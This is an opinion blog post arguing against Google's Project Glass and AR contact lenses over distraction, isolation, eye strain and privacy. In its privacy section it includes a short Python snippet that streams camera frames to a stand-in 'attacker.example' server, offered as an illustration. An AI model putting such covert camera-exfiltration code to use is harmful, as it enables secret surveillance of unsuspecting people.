Google Wants to Augment Your Reality

I’ve known this was coming for some time, but it’s actually more alarming than I expected it to be.

Google’s Project Glass is an augmented reality system based on the idea of wearable computers: in this case, a pair of glasses that compresses all the functionality of a smartphone (phone, messaging, camera, GPS, social networking, etc.) into one hands-free, voice-controlled device.

Here’s the first look at it in action:

[Video: Google’s Project Glass concept demonstration.]

The prototype appears to have a single screen positioned above the right eye, which suggests that it is possible to look away from the image:

[Image: the Project Glass prototype glasses.]
But the New York Times is reporting that

Project Glass could hypothetically become Project Contact Lens. [Babak] Parviz, who is also an associate professor at the University of Washington, specializes in bionanotechnology, which is the fusion of tiny technologies and biology. He most recently built a tiny contact lens that has embedded electronics and can display pixels to a person’s eye.

It looks like this:

[Image: Parviz’s prototype contact lens with embedded electronics.]
We’ve been through many stages in the development of computer technology, and a number of the most important ones involved lowering the barriers between user and device. Input has evolved from the punch card to the command line to the mouse to the stylus to touch, each time bringing the technology closer to the individual.

Yet one thing has remained fixed: the screen. We’ve moved it around a bit, tarted it up with colors, shrunk it down, even started making it flexible. But the screen was always out there, at a distance. It was separate from ourselves.

I worked extensively with the early consumer “VR” headsets (I still have some around here somewhere) and found them all unsatisfactory, not just for technological or ergonomic reasons, but for the way they shut out the world and isolated the user. As technology has improved, those problems of total immersion have remained a constant, and have even gotten worse.

Sensory-deprivation studies on humans have revealed an effect called “faulty source monitoring”, which can occur within 15 minutes of a test subject being placed in a sensory-deprivation room or tank. This means that the brain quickly starts to malfunction in its ability to recognize the source of what it is perceiving. The result? Hallucinations.

That’s an incredibly fast reaction, and it goes a long way toward explaining why total-immersion VR is acutely uncomfortable for many: normal sensory input is being subjugated to artificial sensory input. Even really vivid 3D films and theme-park rides can leave people woozy and discombobulated, and it’s not just from motion sickness. It’s from the fact that your senses are being screwed with.

The glasses for Project Glass are not total immersion. They do not deprive the senses of stimulus. In fact, they add new stimulus: the data streaming through the projected image and the earpieces. However, we’re dealing with a similar problem: the brain’s ability to process radical shifts in its accustomed sensory input.

The video shows a person walking around the city, doing all the usual smartphone tasks with an image floating in front of him. I get irritated when I have a floater in my eye, so I can’t imagine having Clippy or some other idiotic icon prancing around my field of vision. That alone makes this a total non-starter for me. In fact, I see a whole host of issues with this kind of tech.

First, we already have problems with people walking or driving while texting. Lifting the image from the device and placing it in front of the eye doesn’t make that better; it makes it worse. People cannot effectively split their concentration between two fields of vision, but the glasses will give them the illusion that they can. It takes intense training to get a fighter pilot to use a HUD (heads-up display) correctly, yet we think we’re going to strap the functional equivalent of a HUD to millions of people and just send them on their way?

Second, can you imagine a city full of people talking to themselves as they gaze at something no one else can see? It would be like living in a madhouse. Smartphones and personal music devices have already disconnected many people from each other. Augmented reality, particularly in a contact lens, would pretty much finish us off as a species. Further integration of people with technology means greater distance between people and their fellow humans.

Third, what exactly are we gaining from this? I can think of a few jobs that could benefit from augmented reality (work involving machinery, operating complex systems, possibly medical applications), but very little about my everyday life that it could improve. It offers a very minor gain in convenience (hands-free operation and a more convenient location for the image are about it) at the sacrifice of so much.

Fourth, what will it do to our brains? If symptoms of faulty source monitoring started to emerge after only 15 minutes of sensory deprivation, what kind of neurological and psychological problems will emerge with a constant data stream in your eyeball? Are they studying the way this affects the brain? Is anyone even asking the question?

Fifth, what about vision? The constant refocusing between near and far that this must require would put a huge strain on the eye itself. Are they studying how this affects eyesight? The video shows it being used in daylight. What about at night? Presumably the screen would have to be illuminated, and if so, does it interfere with night vision?
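To put a rough number on that strain (these are my own back-of-envelope figures, not anything Google has published): the eye’s focusing effort is measured in diopters, the reciprocal of the viewing distance in meters. A street scene sits at optical infinity, roughly zero diopters; a virtual image floating at arm’s length, say half a meter, demands:

% Accommodative demand, D = 1/d, with d the viewing distance in meters.
% Assumed distances for illustration only, not Project Glass specs.
\[
  \Delta D \;=\; D_{\text{near}} - D_{\text{far}} \;=\; \frac{1}{0.5\ \text{m}} - \frac{1}{\infty} \;=\; 2\ \text{diopters}
\]

So every glance between the overlay and the street could require a two-diopter accommodation swing, unless the optics collimate the image so that its virtual focus sits near infinity. The video gives no hint either way.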

Sixth, how much control of our senses are we giving over to third parties? If you can stop and take a picture of anything you’re looking at, doesn’t that mean someone could access your camera and simply follow you around, in a first-person view, without you even knowing it? If you have a screen in your contact lens, how long before people start buying ad space on it? Who’s creating the applications you use with this technology, and what are their motivations and intentions? It’s one thing when you’re staring at a screen on your desk or something in your palm, a couple of feet away from your body. But when that image is integrated with your very perception of reality, it becomes that much more powerful. Is it really a good idea to let not just the technology, but the technologists, have that much access to your perceptions?
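To make that worry concrete, here is a minimal sketch, in Python, of how little code a rogue application with camera permission would need in order to stream a wearer’s first-person view to a remote server. The camera index and the server URL are hypothetical stand-ins; this uses the general-purpose OpenCV and Requests libraries and is not based on any actual Glass API.

import cv2
import requests

SERVER = "https://attacker.example/upload"  # hypothetical endpoint

# Open the default camera; on a wearable, this is the head-mounted view.
cam = cv2.VideoCapture(0)

while True:
    ok, frame = cam.read()          # one frame of whatever the wearer sees
    if not ok:
        break
    _, jpeg = cv2.imencode(".jpg", frame)   # compress the frame to JPEG
    requests.post(SERVER, data=jpeg.tobytes(),
                  headers={"Content-Type": "image/jpeg"})

The point is not that Google would ship anything like this; it is that any third-party app granted camera access could run something this simple, and the wearer would have no visual cue that it was happening.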

We are reaching the acceptable limit of convergence between man and machine. Our machines need to remain outside of us, apart from us, so that we can perceive them for what they are: tools to be set aside. They cannot be allowed to alter us at an ontological level, and the ability to manipulate basic sensory input gets perilously close to becoming an ontological problem. We are not merely what we perceive through our senses, but that is an awfully large part of our being. Using technology to create a whole new paradigm for the way we see and hear our world is fraught with all kinds of dangers, and for what reward? Being able to check in at a hot dog stand on Foursquare without touching your phone?

I’m sure mobile technology can evolve far beyond the current handset paradigm. The question is: do we want it to? Do we need it to?


